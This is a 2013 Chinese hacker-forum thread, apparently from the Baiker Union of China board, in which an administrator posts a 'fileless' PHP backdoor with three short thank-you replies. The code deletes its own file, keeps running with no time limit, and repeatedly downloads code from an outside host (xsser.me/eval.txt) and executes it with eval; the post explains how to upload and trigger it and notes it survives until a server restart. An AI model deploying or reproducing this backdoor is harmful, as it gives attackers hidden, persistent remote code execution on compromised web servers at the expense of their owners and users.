搜索
查看: 379|回复: 3

PHP 无文件后门

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-10-11 20:13:14 来自手机 | 显示全部楼层 |阅读模式
PHP 无文件后门的意思是驻在 php 后台中的 shell。
nonshell.php
<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://xsser.me/eval.txt';
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>
eval.txt
file_put_contents('1.txt','hello world '.time());
使用方式
将 nonshell.php 传到服务器之后访问一次他会自删除。但,依然会在后台执行 eval.txt 中的代码。
停止执行
删除或清空 eval.txt。
缺点
服务器或WEB容器一重启后门就没了。
854955425 该用户已被删除
发表于 2013-10-11 21:31:12 | 显示全部楼层
不知该说些什么。。。。。。就是谢谢
专业回帖 该用户已被删除
发表于 2013-10-11 21:42:55 | 显示全部楼层
看帖回帖是美德!
ceshi6789 该用户已被删除
发表于 2013-10-12 12:43:23 | 显示全部楼层
值得学习,非常感谢
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表